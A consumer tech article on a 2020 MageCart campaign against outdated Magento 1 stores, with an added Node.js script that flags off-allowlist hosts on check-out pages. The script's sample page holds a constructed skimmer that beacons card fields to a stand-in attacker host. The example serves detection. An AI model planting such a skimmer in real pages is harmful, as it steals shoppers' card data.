Cyberattacks on e-commerce websites are becoming more common each year. Some involve direct hacks of the victim company, while others involve rigging a store's website so that it steals credit card details and personal data as shoppers type them in. Tap or click here for a rundown on some of last year's biggest eCommerce hacks. Now, one of the largest e-commerce hacks since 2015 has hit a platform that thousands of online stores rely on: Magento. Because the affected stores were running an outdated, unsupported version, nearly 2,000 of them were altered to steal credit card information from customers. Here's how we think it happened, and what you can do to stay safe.
The ultimate MageCart attack?
A new report by researchers at Sanguine Security showed that nearly 2,000 separate online stores were compromised in what it calls the largest automated MageCart campaign ever. For those who don't know, a MageCart attack involves compromising an online store so that its check-out page silently copies the data customers type in, especially credit card details, and sends it to the attackers. Tap or click here for more details on how this cyberattack pattern works.

These websites all had one thing in common: a back end running Magento, a powerful e-commerce platform owned by Adobe. The majority of the hacked sites were using an outdated version of Magento, Magento 1, which no longer receives security fixes and lacks protections included in the current version. Hackers exploited flaws in that version to carry out the attacks.

From September 11 through 14, 2020, Sanguine Security detected 1,904 Magento stores hit by the campaign. Each had malicious code injected into its check-out page that harvested customer data and sent it to a URL controlled by the hackers. We don't know for certain which exploit was used, but posts on a Dark Web forum dating back to August advertised Magento exploits for sale at upwards of $5,000. The seller reported selling to a total of 10 people, which may explain how the attackers were able to pull off such a coordinated effort.

Because Magento 1 reached end of life on June 30, 2020, there is no official support or patch for it. Merchants still on it should treat this incident as the push to migrate to a supported platform such as Magento 2, which receives security updates. Note that upgrading alone does not remove a skimmer that is already in place: a store that was running Magento 1 during this window should also check its check-out page for injected scripts and reset administrator credentials.
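The attack described above works by adding a script to the check-out page that posts form fields to a host the store does not own. One practical check a merchant can run is to scan the rendered check-out HTML for script sources and URL literals whose host is not on the store's own allowlist. The following Node.js example is added here to illustrate that check; it is not code from the article, from Sanguine Security or from Magento. The store hostnames, the sample page and the stand-in skimmer script inside it are all constructed for this example.

```javascript
// Added example (not from the article or from any vendor): flag scripts on a
// check-out page that load from, or reference, hosts outside the store's
// allowlist. Everything below, including the "skimmer", is constructed.

// Assumed first-party hosts for a hypothetical store.
const FIRST_PARTY = ["shop.example", "static.shop.example"];

// Resolve a script URL (absolute, protocol-relative or relative) to a hostname.
function hostOf(url, base = "https://shop.example/") {
  try {
    return new URL(url, base).hostname.toLowerCase();
  } catch {
    return null; // not a parseable URL; ignore it
  }
}

// A host is allowed if it equals an allowlisted host or is a subdomain of one.
function isAllowed(host, allowlist) {
  return allowlist.some((a) => host === a || host.endsWith("." + a));
}

// Return every host referenced by <script src> attributes or by URL literals
// inside inline <script> bodies that is not on the allowlist, sorted.
// Skimmer loaders and exfiltration endpoints are usually hard-coded strings,
// which is what this catches; obfuscated or assembled URLs will slip past it.
function findUnexpectedHosts(html, allowlist) {
  const found = new Set();
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  const srcRe = /\bsrc\s*=\s*["']([^"']+)["']/i;
  const urlRe = /https?:\/\/[^\s"'<>)]+/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    const candidates = [];
    const src = srcRe.exec(attrs);
    if (src) candidates.push(src[1]);
    for (const u of body.match(urlRe) || []) candidates.push(u);
    for (const u of candidates) {
      const h = hostOf(u);
      if (h && !isAllowed(h, allowlist)) found.add(h);
    }
  }
  return [...found].sort();
}

// Constructed check-out page: one legitimate first-party script, then an
// inline stand-in for an injected skimmer that serialises the card fields on
// submit and beacons them to an attacker-controlled host via an image request.
const SAMPLE_CHECKOUT = `
<html><body>
<script src="https://static.shop.example/js/checkout.js"></script>
<form id="checkout"><input name="cc_number"><input name="cc_cvv"></form>
<script>
document.getElementById("checkout").addEventListener("submit", function () {
  var d = {};
  document.querySelectorAll("#checkout input").forEach(function (i) { d[i.name] = i.value; });
  new Image().src = "https://cdn-stats.attacker.test/collect?d=" + btoa(JSON.stringify(d));
});
</script>
</body></html>`;

console.log(findUnexpectedHosts(SAMPLE_CHECKOUT, FIRST_PARTY));
// → [ 'cdn-stats.attacker.test' ]
```

Run this against a page fetched with the same cookies and user agent a real shopper would send, since some skimmers only serve their payload to browsers on the check-out path. A non-empty result is a lead to investigate, not proof of compromise: legitimate analytics or payment scripts will also appear until they are added to the allowlist. A Content Security Policy restricting `script-src` and `connect-src` to the same allowlist is the more robust control, because it blocks the exfiltration request even when the injected code is obfuscated.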
I was shopping online over the weekend. Am I in trouble?
While there isn't a public-facing list of every store affected by the hack, law enforcement does have access to the names of the stores obtained by Sanguine Security. If you were affected, expect the site owner to reach out to you about your status. If you're told that your data was leaked, call your bank or credit card provider right away and let them know your card was compromised; they can block the card and stop fraudulent charges before they post. You may also want to contact a credit bureau and place a freeze on your credit for peace of mind. Tap or click here to see how to set up a credit freeze.

To protect yourself from MageCart attacks going forward, you must be vigilant and cautious. One of the things that makes these attacks so scary is that they are totally invisible unless you know code: the skimmer runs inside the store's own legitimate page, so the padlock icon and HTTPS offer no protection, because your card details are copied before they are ever encrypted for the store. But if you keep these factors in mind, you will be much safer:

In addition to these steps, the usual advice of strong, unique passwords and two-factor authentication applies here. By forcing hackers to take an extra step to log in to your accounts, you give yourself a chance to catch them in the act. Tap or click to set up two-factor authentication for the most popular platforms on the web.